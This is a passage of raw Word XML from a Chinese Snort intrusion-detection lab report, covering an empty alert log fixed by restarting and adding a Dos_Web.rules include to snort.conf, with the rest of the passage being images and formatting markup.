          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidR="00D30667" w:rsidRPr="00D30667">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>运行snort并结束其进程后</w:t>
      </w:r>
      <w:r w:rsidR="00D30667">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00D30667" w:rsidRPr="00D30667">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>alert日志文件</w:t>
      </w:r>
      <w:r w:rsidR="00D30667">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件为空。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCC1B52" w14:textId="54C1F9BE" w:rsidR="00652EBA" w:rsidRDefault="00D30667" w:rsidP="00D30667">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3096C65D" wp14:editId="0AC038DA">
            <wp:extent cx="5274310" cy="3320415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1177812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12045" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3320415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0751FE64" w14:textId="3BC1073F" w:rsidR="00652EBA" w:rsidRPr="00652EBA" w:rsidRDefault="00652EBA" w:rsidP="00652EBA">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00652EBA">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>（二）解决</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589D9DC3" w14:textId="10D51578" w:rsidR="00652EBA" w:rsidRDefault="00652EBA" w:rsidP="00652EBA">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1、点击“关闭”</w:t>
      </w:r>
      <w:r w:rsidR="00D478CC">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;“重启”</w:t>
      </w:r>
      <w:r w:rsidR="00D604E4">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，再打开入侵检测发现正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EDF8FC" w14:textId="6275B60F" w:rsidR="00652EBA" w:rsidRDefault="00652EBA" w:rsidP="00652EBA">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58D64779" wp14:editId="2A84BBEC">
            <wp:extent cx="5271950" cy="1348966"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3810"/>
            <wp:docPr id="478759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59940" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId37"/>
                    <a:srcRect t="-1" b="53898"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1349570"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE2761E" w14:textId="790121EE" w:rsidR="00652EBA" w:rsidRDefault="00652EBA" w:rsidP="00652EBA">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3B7FA2A5" wp14:editId="0BE123E2">
            <wp:extent cx="5271562" cy="1272012"/>
            <wp:effectExtent l="0" t="0" r="5715" b="4445"/>
            <wp:docPr id="190010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01323" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId38"/>
                    <a:srcRect t="-1" b="56525"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="1272675"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5E7D28" w14:textId="446FE6D9" w:rsidR="00E50844" w:rsidRDefault="00E50844" w:rsidP="00652EBA">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2、编辑</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E50844">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋"/>
        </w:rPr>
        <w:t>snort.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00E50844">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>添加include $RULE_PATH/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E50844">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Dos_Web.rules</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E50844">
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并保存</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A4ECA71" w14:textId="2C0D138C" w:rsidR="00E555D7" w:rsidRPr="00E50844" w:rsidRDefault="00E50844" w:rsidP="00E50844">
      <w:pPr>
        <w:spacing w:beforeLines="50" w:before="156" w:afterLines="50" w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="华文仿宋" w:eastAsia="华文仿宋" w:hAnsi="华文仿宋" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="239926AC" wp14:editId="5CD9D6AA">
            <wp:extent cx="5274310" cy="3320415"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1115708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08527" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId39"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5274310" cy="3320415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00E555D7" w:rsidRPr="00E50844">
      <w:footerReference w:type="defaul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275A9" w14:textId="77777777" w:rsidR="0028701A" w:rsidRDefault="0028701A" w:rsidP="00D7464B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2A702BEC" w14:textId="77777777" w:rsidR="0028701A" w:rsidRDefault="0028701A" w:rsidP="00D7464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1"/>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89130624"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtContent>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="1728636285"/>
          <w:docPartObj>
            <w:docPartGallery w:val="Page Numbers (Top of Page)"/>
            <w:docPartUnique/>
          </w:docPartObj>
        </w:sdtPr>
        <w:sdtContent>
          <w:p w14:paraId="6315D876" w14:textId="338C36A5" w:rsidR="00637BAF" w:rsidRDefault="00637BAF">
            <w:pPr>
              <w:pStyle w:val="a5"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00637BAF">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00637BAF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00637BAF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:instrText>PAGE</w:instrText>
            </w:r>
            <w:r w:rsidRPr="00637BAF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00637BAF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00637BAF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
            <w:r w:rsidRPr="00637BAF">
              <w:rPr>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t xml:space="preserve"> / </w:t>
            </w:r>
            <w:r w:rsidRPr="00637BAF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="00637BAF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:instrText>NUMPAGES</w:instrText>
            </w:r>
            <w:r w:rsidRPr="00637BAF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidRPr="00637BAF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:val="zh-CN"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidRPr="00637BAF">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:p>
        </w:sdtContent>
      </w:sdt>
    </w:sdtContent>
  </w:sdt>
  <w:p w14:paraId="2D67C359" w14:textId="77777777" w:rsidR="00637BAF" w:rsidRDefault="00637BAF">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06F0D" w14:textId="77777777" w:rsidR="0028701A" w:rsidRDefault="0028701A" w:rsidP="00D7464B">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3C89E01F" w14:textId="77777777" w:rsidR="0028701A" w:rsidRDefault="0028701A" w:rsidP="00D7464B">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750858"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="75C0B86E"/>
    <w:lvl w:ilvl="0" w:tplc="725CA2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9667B4"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F114434A"/>
    <w:lvl w:ilvl="0" w:tplc="35289BF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FF12A5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B31A75E8"/>
    <w:lvl w:ilvl="0" w:tplc="D2BE59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6840294">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1621497392">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="407312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06"/>
    <w:rsid w:val="000170E1"/>
    <w:rsid w:val="000225CC"/>
    <w:rsid w:val="0002515A"/>
    <w:rsid w:val="0003233C"/>
    <w:rsid w:val="00065810"/>
    <w:rsid w:val="00083D28"/>
    <w:rsid w:val="00084A80"/>
    <w:rsid w:val="00086A53"/>
    <w:rsid w:val="00093A01"/>
    <w:rsid w:val="000A591B"/>
    <w:rsid w:val="000B1CDF"/>
    <w:rsid w:val="000D3ED7"/>
    <w:rsid w:val="000D6FF6"/>
    <w:rsid w:val="000F10CE"/>
    <w:rsid w:val="001051E3"/>
    <w:rsid w:val="001174BB"/>
    <w:rsid w:val="00154936"/>
    <w:rsid w:val="001A7F0E"/>
    <w:rsid w:val="001B10DA"/>
    <w:rsid w:val="001B26E9"/>
    <w:rsid w:val="001B36D5"/>
    <w:rsid w:val="001B465E"/>
    <w:rsid w:val="001B49EF"/>
    <w:rsid w:val="001D32B6"/>
    <w:rsid w:val="001E726C"/>
    <w:rsid w:val="00235934"/>
    <w:rsid w:val="0025176D"/>
    <w:rsid w:val="00254E83"/>
    <w:rsid w:val="0028701A"/>
    <w:rsid w:val="002B1A87"/>
    <w:rsid w:val="002D3E2F"/>
    <w:rsid w:val="003177D6"/>
    <w:rsid w:val="0032287F"/>
    <w:rsid w:val="00324090"/>
    <w:rsid w:val="00347CC9"/>
    <w:rsid w:val="00352B8D"/>
    <w:rsid w:val="003B4367"/>
    <w:rsid w:val="003B56F8"/>
    <w:rsid w:val="003C4B9A"/>
    <w:rsid w:val="003D6B9D"/>
    <w:rsid w:val="00403182"/>
    <w:rsid w:val="0040388D"/>
    <w:rsid w:val="004119C1"/>
    <w:rsid w:val="00417DA9"/>
    <w:rsid w:val="00424281"/>
    <w:rsid w:val="00464C87"/>
    <w:rsid w:val="00471014"/>
    <w:rsid w:val="00477D50"/>
    <w:rsid w:val="004B4EB0"/>
    <w:rsid w:val="00502536"/>
    <w:rsid w:val="00532E55"/>
    <w:rsid w:val="00584E99"/>
    <w:rsid w:val="005A3CEE"/>
    <w:rsid w:val="005C03EE"/>
    <w:rsid w:val="005C3430"/>
    <w:rsid w:val="005D565C"/>
    <w:rsid w:val="00601518"/>
    <w:rsid w:val="006207B3"/>
    <w:rsid w:val="00623BC6"/>
    <w:rsid w:val="00637BAF"/>
    <w:rsid w:val="00647CA7"/>
    <w:rsid w:val="00652EBA"/>
    <w:rsid w:val="006543D6"/>
    <w:rsid w:val="00683EA1"/>
    <w:rsid w:val="0069508B"/>
    <w:rsid w:val="00695430"/>
    <w:rsid w:val="006A21ED"/>
    <w:rsid w:val="006A34A5"/>
    <w:rsid w:val="006B7222"/>
    <w:rsid w:val="0071027C"/>
    <w:rsid w:val="00720502"/>
    <w:rsid w:val="007625A3"/>
    <w:rsid w:val="00764D7B"/>
    <w:rsid w:val="00767634"/>
    <w:rsid w:val="007A7A59"/>
    <w:rsid w:val="007F27B9"/>
    <w:rsid w:val="00836FF2"/>
    <w:rsid w:val="00842853"/>
    <w:rsid w:val="00846864"/>
    <w:rsid w:val="0086016F"/>
    <w:rsid w:val="00862A67"/>
    <w:rsid w:val="008715B6"/>
    <w:rsid w:val="00881EB4"/>
    <w:rsid w:val="008A754F"/>
    <w:rsid w:val="008F6C1A"/>
    <w:rsid w:val="0092707B"/>
    <w:rsid w:val="0097356A"/>
    <w:rsid w:val="009C7C66"/>
    <w:rsid w:val="009D4006"/>
    <w:rsid w:val="00A066A2"/>
    <w:rsid w:val="00A070A7"/>
    <w:rsid w:val="00A154E5"/>
    <w:rsid w:val="00A67159"/>
    <w:rsid w:val="00AC393A"/>
    <w:rsid w:val="00AC3E94"/>
    <w:rsid w:val="00AC4713"/>
    <w:rsid w:val="00AD0BB9"/>
    <w:rsid w:val="00AD1DDA"/>
    <w:rsid w:val="00AF6EA0"/>
    <w:rsid w:val="00B459FC"/>
    <w:rsid w:val="00B6538D"/>
    <w:rsid w:val="00B77A29"/>
    <w:rsid w:val="00B8293A"/>
    <w:rsid w:val="00B92A0D"/>
    <w:rsid w:val="00BB7068"/>
    <w:rsid w:val="00C22578"/>
    <w:rsid w:val="00C66B7F"/>
    <w:rsid w:val="00CC51AD"/>
    <w:rsid w:val="00CC6172"/>
    <w:rsid w:val="00CF4D5D"/>
    <w:rsid w:val="00D003CC"/>
    <w:rsid w:val="00D30667"/>
    <w:rsid w:val="00D478CC"/>
    <w:rsid w:val="00D604E4"/>
    <w:rsid w:val="00D7464B"/>
    <w:rsid w:val="00DA262B"/>
    <w:rsid w:val="00DB1963"/>
    <w:rsid w:val="00DC1294"/>
    <w:rsid w:val="00E0043A"/>
    <w:rsid w:val="00E02C8A"/>
    <w:rsid w:val="00E50844"/>
    <w:rsid w:val="00E555D7"/>
    <w:rsid w:val="00E66906"/>
    <w:rsid w:val="00E97CBB"/>
    <w:rsid w:val="00EB6085"/>
    <w:rsid w:val="00EE2563"/>
    <w:rsid w:val="00EF64AA"/>
    <w:rsid w:val="00F1440C"/>
    <w:rsid w:val="00F202CD"/>
    <w:rsid w:val="00F66015"/>
    <w:rsid w:val="00F80A8B"/>
    <w:rsid w:val="00F91D5A"/>
    <w:rsid w:val="00FD0855"/>
    <w:rsid w:val="00FE6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C9F49"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{27FEDFE8-6088-4B45-9777-EF1B91DBB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27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464B"/>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7464B"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a5">
    <w:name w:val="footer"/>
    <w:basedOn w:val="a"/>
    <w:link w:val="a6"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D7464B"/>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7464B"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a7">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00D7464B"/>
    <w:pPr>
      <w:ind w:firstLineChars="200" w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="a8">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="a"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00695430"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="a9">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00477D50"/>
    <w:rPr>
      <w:color w:val="467886" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="aa">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="a0"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00477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77970">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1835099200">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="51513867">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1190795456">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="68502444">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="2003504469">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="193494907">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="744569727">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
      </w:divsChild>
    </w:div>
    <w:div w:id="209003279">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
